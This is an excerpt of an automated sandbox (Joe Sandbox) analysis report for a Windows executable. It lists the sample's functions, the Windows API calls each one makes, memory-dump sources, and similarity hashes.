                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 201cc787c0d48024b2e0f509d7526ac8bd14488ce395e8c852ac428a28273e78
                                                                                                                                                                                                                                                                                        • Instruction ID: ec8c5176570c8b1099d72fcf8987607942b559c254b3024edba1267a856dc291
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 201cc787c0d48024b2e0f509d7526ac8bd14488ce395e8c852ac428a28273e78
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D21B5316102459FDF149FB8CC08A6A37A5EB863B4F35462AF926C21E0DE308842FB52
                                                                                                                                                                                                                                                                                        Function 00F236F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00F236E9,00F23355), ref: 00F23700
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F2370E
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F23727
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00F236E9,00F23355), ref: 00F23779
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7feded93b562ad2f225923c316fc70ca414298fdc7d80543bd14f72e99c9ddfe
                                                                                                                                                                                                                                                                                        • Instruction ID: d312115b955e02f21d49bc287841f02b5d0a637bd2ba23b99ce2d17b06e106cc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7feded93b562ad2f225923c316fc70ca414298fdc7d80543bd14f72e99c9ddfe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D01D4F7A5E3356EAA2427B8BDC6A6A3A94EB15771B20023AF510420F1EF5D4D027540
                                                                                                                                                                                                                                                                                        Function 00F330E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00F24D53,00000000,?,?,00F268E2,?,?,00000000), ref: 00F330EB
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3311E
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33146
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F33153
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F3315F
                                                                                                                                                                                                                                                                                        • _abort.LIBCMT ref: 00F33165
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a703a5ad54843a4aa9f65b4877c6dc1f5f573118017cf788ee67622222d08e12
                                                                                                                                                                                                                                                                                        • Instruction ID: 584aeacb5f09c046f869021ecb013b5089ed47edcef2fc60b0bd998cd66ffed3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a703a5ad54843a4aa9f65b4877c6dc1f5f573118017cf788ee67622222d08e12
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EF0C836E0450527D262B735AD07F5E366A9FC1771F390425FA24D22E1EF288A027161
                                                                                                                                                                                                                                                                                        Function 00F99480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F01F87
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: SelectObject.GDI32(?,00000000), ref: 00F01F96
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: BeginPath.GDI32(?), ref: 00F01FAD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: SelectObject.GDI32(?,00000000), ref: 00F01FD6
                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00F994AA
                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,00000003,00000000), ref: 00F994BE
                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00F994CC
                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,00000000,00000003), ref: 00F994DC
                                                                                                                                                                                                                                                                                        • EndPath.GDI32(?), ref: 00F994EC
                                                                                                                                                                                                                                                                                        • StrokePath.GDI32(?), ref: 00F994FC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0ee7fe50af9eb3edc54aa0a464d602548d95d226150d9ca782078208c3ea9cbe
                                                                                                                                                                                                                                                                                        • Instruction ID: 9a8731d0ed2d6aafe73e6e5ca32ac5052c243ad255e91c956ffdd317dafd35b3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ee7fe50af9eb3edc54aa0a464d602548d95d226150d9ca782078208c3ea9cbe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D311C97600010DBFEF129F94DC89E9A7F6DEB08364F148016BA195A1B1C7719D56EBA0
                                                                                                                                                                                                                                                                                        Function 00F65B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F65B7C
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F65B8D
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F65B94
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00F65B9C
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F65BB3
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00F65BC5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 88d218a9459578c38901155ab6fd8087ab6e9762564f55be18cb7b4233dc3b32
                                                                                                                                                                                                                                                                                        • Instruction ID: a6a4e89d9e3bb09279e3e7f7b13e9e2eac7947fee0159367eff371ad9eb2f464
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88d218a9459578c38901155ab6fd8087ab6e9762564f55be18cb7b4233dc3b32
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E014FB5E00718BBEB109BA59C49E4EBFB8EB48751F104066FA09A7290D6709C00DFA0
                                                                                                                                                                                                                                                                                        Function 00F0327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F032AF
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00F032B7
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F032C2
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F032CD
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00F032D5
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F032DD
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Virtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                        • Opcode ID: da6864de63ea720406ced3e53ea257a555f146849b0c867bae2ffbcb459577ef
                                                                                                                                                                                                                                                                                        • Instruction ID: 5abb8f935772adb3e309515158030cb5368ef003893fc9b8a1f71042d56771c3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da6864de63ea720406ced3e53ea257a555f146849b0c867bae2ffbcb459577ef
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 380167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                                                                                                                                                                                        Function 00F6F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F6F447
                                                                                                                                                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F6F45D
                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00F6F46C
                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6F47B
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6F485
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6F48C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ce760d8379089d95945dc9bb5f24e24af09e78e60ca0fc1ec6d6d1a6bc28e3c3
                                                                                                                                                                                                                                                                                        • Instruction ID: 5ae57f8cc6e330eeeed3c637a0158ad8192f210e4fa8d10d28f4624831cf11dd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce760d8379089d95945dc9bb5f24e24af09e78e60ca0fc1ec6d6d1a6bc28e3c3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44F03A3264115CBBE7215BA29C0EEEF3B7CEFC6B15F10005AF60192091DBA06A41E6B5
                                                                                                                                                                                                                                                                                        Function 00F434D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?), ref: 00F434EF
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F43506
                                                                                                                                                                                                                                                                                        • GetWindowDC.USER32(?), ref: 00F43512
                                                                                                                                                                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00F43521
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F43533
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000005), ref: 00F4354D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4bbafacf06d036e9ea575417bfba69ce0b017d4e6d648abb1c6b2371c4ab76c9
                                                                                                                                                                                                                                                                                        • Instruction ID: bf9d4f0fb9133e2e7bdba220ca4b4194c842d8ab88256db6c5a00f65abe7fe60
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bbafacf06d036e9ea575417bfba69ce0b017d4e6d648abb1c6b2371c4ab76c9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2014B32500109EFDB505FA4DC08BE97FB5FB54321F650162F91AA21A0CB311E91BF11
                                                                                                                                                                                                                                                                                        Function 00F621C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F621CC
                                                                                                                                                                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00F621D8
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F621E1
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F621E9
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00F621F2
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F621F9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d58d62b5efe21ce0baa2b5d7562a51e599da2cfa3e202a6353305f369f8a89dc
                                                                                                                                                                                                                                                                                        • Instruction ID: 4a53bd7d98afa43f6ce05c2286a5f83b76e86146c415703e208b71c7badcc3f6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d58d62b5efe21ce0baa2b5d7562a51e599da2cfa3e202a6353305f369f8a89dc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1E01A77404109BFEB011FE1ED0DD0ABF39FF49322BA04222F22582074CB329460EB51
                                                                                                                                                                                                                                                                                        Function 00F6CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F041EA: _wcslen.LIBCMT ref: 00F041EF
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F6CF99
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6CFE0
                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F6D047
                                                                                                                                                                                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F6D075
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 0350daad5a1e9f08724870689f496b35ca68fe8d080c98451b87ea0eab3a1751
                                                                                                                                                                                                                                                                                        • Instruction ID: 8ecf2842767b8446faf743605ee3a8b348738a2f80cdc4acc61a55a94f3d9cde
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0350daad5a1e9f08724870689f496b35ca68fe8d080c98451b87ea0eab3a1751
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA51C072F04300ABD714AF28DC45B6BB7E9AF59324F080A2AF995D3191DB74C905B792
                                                                                                                                                                                                                                                                                        Function 00F8B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00F8B903
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F041EA: _wcslen.LIBCMT ref: 00F041EF
                                                                                                                                                                                                                                                                                        • GetProcessId.KERNEL32(00000000), ref: 00F8B998
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F8B9C7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                        • String ID: <$@
                                                                                                                                                                                                                                                                                        • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                        • Opcode ID: c3e5fc7e9ce64560178ff3c2f2298391c5fb598814eed4f364313df8ecc46c25
                                                                                                                                                                                                                                                                                        • Instruction ID: 95f32d8104d4f7adb89dc8b06749324ab6e7512a545a7f904e71f9d4366fd9d6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3e5fc7e9ce64560178ff3c2f2298391c5fb598814eed4f364313df8ecc46c25
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4717C75A00619DFCB10EF94C895A9EBBF5FF08310F048499E855AB392CB74ED46EB90
                                                                                                                                                                                                                                                                                        Function 00F67B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F67B6D
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F67BA3
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F67BB4
